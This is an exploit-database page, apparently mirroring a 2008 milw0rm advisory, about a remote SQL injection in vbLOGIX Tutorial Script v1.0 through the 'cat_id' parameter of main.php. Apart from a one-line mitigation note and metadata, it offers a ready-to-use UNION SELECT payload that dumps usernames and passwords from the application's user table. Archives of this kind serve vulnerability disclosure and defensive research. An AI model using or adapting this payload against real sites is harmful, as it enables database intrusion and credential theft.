vbLOGIX Tutorial Script - exploit.company

vendor:

vblogix_tutorial_script

by:

FIREH4CK3R

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: vblogix_tutorial_script

Affected Version From: v1.0

Affected Version To: v1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:vblogix:vblogix_tutorial_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

vbLOGIX Tutorial Script <= v1.0 (cat_id) Remote SQL Injection Exploit

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'cat_id' parameter to the 'main.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation allows to read arbitrary data from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#=====================================================================================================
#vbLOGIX Tutorial Script <= v1.0 (cat_id) Remote SQL Injection Exploit
#=====================================================================================================
#
#
#Venedor site : http://www.vblogix.com/
#
#Demo site: http://www.vb-demo.com/
#
#Version : v1.0
#
#=====================================================================================================
#
#DORK : no have
#
#
#Exploit :
#--------------------------------
# main.php?act=list&cat_id=-1+UNION+ALL+SELECT+concat(usrname,0x3a,psswd)+FROM+t_user/*
#
#=====================================================================================================
#Discoverd By : FIREH4CK3R
#
#Contact : firehacker_msn[at]hotmail.com
#
#Greetz To : FIREH4CK3R, Sh0rtKiller, Park, Dark, SecurityBR
#
#
#=====================================================================================================

# milw0rm.com [2008-09-12]